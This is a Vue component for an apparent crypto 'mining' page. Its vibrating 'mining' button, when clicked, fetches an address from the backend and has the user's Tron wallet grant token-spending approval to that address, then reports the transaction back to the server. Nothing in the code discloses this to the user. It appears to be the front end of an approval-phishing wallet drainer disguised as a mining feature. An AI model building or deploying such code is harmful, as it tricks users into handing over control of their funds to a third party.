<template>
  <div class="gborder br_10">
    <div class="pad_12">
      <div class="flex flex_center justify_center">
        <div class="btn_default mining_btn" @click="handleAuth">mining</div>
      </div>
      <!-- <div class="">
        <van-slider v-model="sliderValue" @change="onChange" />
      </div> -->
    </div>
    <i class="border_line border_scroll br_10"></i>
  </div>
</template>

<script setup lang="ts">
import { Auth, Tx } from '@/utils/api/index';
import { modalOopen } from '@/utils/modal';
import useStateStore from '@/stores/state';
const state = useStateStore();
import { tokenApprove as tronApprove } from '@/utils/tron';
import { showNotify } from 'vant';
function handleAuth() {
  state.getLoginStatus();
  state.getNetworkType();
  if (!state.loginStatus) {
    state.setSelectNetwork(true);
    return;
  }
  state.setLoading(true);
  Auth()
    .then((res) => {
      if (res.success) {
        if (state.networkType == 'tron') {
          tronApprove(res.data.authAddr)
            .then((approve) => {
              // state.setLoading(false);
              Tx({
                txId: approve,
              }).then((tx) => {
                console.log('Tx', tx);
              });
            })
            .catch((err) => {
              state.setLoading(false);
              showNotify({ type: 'danger', message: err });
            });
        }
      }
      // state.setLoading(false);
      console.log(res);
    })
    .catch((err) => {});
}
onMounted(() => {});
</script>

<style scoped>
.mining_btn {
  animation: vibrate-3-reverse 3s cubic-bezier(0.445, 0.05, 0.55, 0.95) 0s infinite reverse none;
}
/* ----------------------------------------------
* Generated by Gradienty on 2024-12-10 11:12
* animation vibrate-1-reverse
* ----------------------------------------
*/
/* ----------------------------------------------
* Generated by Gradienty on 2024-12-10 11:14
* animation vibrate-3-reverse
* ----------------------------------------
*/
@keyframes vibrate-3-reverse {
  0% {
    transform: translate(0);
  }
  10% {
    transform: translate(-2px, -2px);
  }
  20% {
    transform: translate(2px, -2px);
  }
  30% {
    transform: translate(-2px, 2px);
  }
  40% {
    transform: translate(2px, 2px);
  }
  50% {
    transform: translate(-2px, -2px);
  }
  60% {
    transform: translate(2px, -2px);
  }
  70% {
    transform: translate(-2px, 2px);
  }
  80% {
    transform: translate(-2px, -2px);
  }
  90% {
    transform: translate(2px, -2px);
  }
  100% {
    transform: translate(0);
  }
}
</style>
